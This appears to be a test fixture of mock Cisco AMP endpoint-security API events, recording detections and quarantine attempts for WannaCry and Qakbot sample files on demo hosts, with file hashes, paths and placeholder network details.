+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt 
Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 